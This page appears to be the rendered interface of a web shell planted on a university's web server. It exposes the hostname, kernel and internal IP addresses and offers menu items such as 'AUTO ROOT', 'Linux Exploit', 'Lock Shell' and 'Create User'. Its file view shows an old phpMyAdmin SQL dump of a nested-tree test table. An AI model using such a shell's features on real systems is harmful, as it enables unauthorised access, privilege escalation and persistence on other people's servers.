Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
lib /
php /
doc /
Tree /
docs /
[ HOME SHELL ]
Name
Size
Permission
Action
TreeEditor
[ DIR ]
drwxr-xr-x
TreeView
[ DIR ]
drwxr-xr-x
config.xml
915
B
-rw-r--r--
Dynamic_DBnested.php
1.67
KB
-rw-r--r--
Dynamic_DBnested.sql
1.47
KB
-rw-r--r--
Dynamic_MDBnested.php
1.68
KB
-rw-r--r--
Memory_DBnested.php
6.53
KB
-rw-r--r--
Memory_DBsimple.php
6.63
KB
-rw-r--r--
Memory_MDBnested.php
6.56
KB
-rw-r--r--
Memory_MDBsimple.php
6.63
KB
-rw-r--r--
Memory_XML.php
5.62
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Dynamic_DBnested.sql
# phpMyAdmin MySQL-Dump # version 2.3.0 # http://phpwizard.net/phpMyAdmin/ # http://www.phpmyadmin.net/ (download page) # # Host: localhost # Generation Time: Jan 30, 2003 at 06:41 PM # Server version: 3.23.48 # PHP Version: 4.3.0 # Database : `test` # -------------------------------------------------------- # # Table structure for table `nestedTree` # CREATE TABLE nestedTree ( id int(11) NOT NULL default '0', name varchar(255) NOT NULL default '', l int(11) NOT NULL default '0', r int(11) NOT NULL default '0', parent int(11) NOT NULL default '0', comment varchar(255) NOT NULL default '', PRIMARY KEY (id) ) TYPE=MyISAM; # # Dumping data for table `nestedTree` # INSERT INTO nestedTree VALUES (1, 'Root', 1, 24, 0, ''); INSERT INTO nestedTree VALUES (2, 'A1', 2, 11, 1, ''); INSERT INTO nestedTree VALUES (3, 'A2', 12, 23, 1, ''); INSERT INTO nestedTree VALUES (4, 'A3', 13, 16, 3, ''); INSERT INTO nestedTree VALUES (5, 'B1', 3, 10, 2, ''); INSERT INTO nestedTree VALUES (6, 'B2', 17, 18, 3, ''); INSERT INTO nestedTree VALUES (7, 'B3', 19, 22, 3, ''); INSERT INTO nestedTree VALUES (8, 'C1', 20, 21, 7, ''); INSERT INTO nestedTree VALUES (9, 'B4', 14, 15, 4, ''); # -------------------------------------------------------- # # Table structure for table `nestedTree_seq` # CREATE TABLE nestedTree_seq ( id int(10) unsigned NOT NULL auto_increment, PRIMARY KEY (id) ) TYPE=MyISAM; # # Dumping data for table `nestedTree_seq` # INSERT INTO nestedTree_seq VALUES (3);
Close